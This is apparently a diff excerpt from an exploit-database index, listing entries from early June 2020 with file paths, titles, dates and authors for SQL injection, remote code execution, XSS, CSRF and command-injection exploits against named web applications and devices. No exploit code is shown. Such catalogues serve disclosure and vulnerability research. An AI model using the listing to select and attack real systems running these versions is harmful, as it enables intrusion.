 48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php,
+48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware,
+48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php,
+48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,
+48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php,
+48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php,
+48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php,
+48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php,
+48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
+48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
+48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
+48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
+48553,exploits/multiple/webapps/48553.txt,"Cayin 
Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
+48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
+48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
+48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
+48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,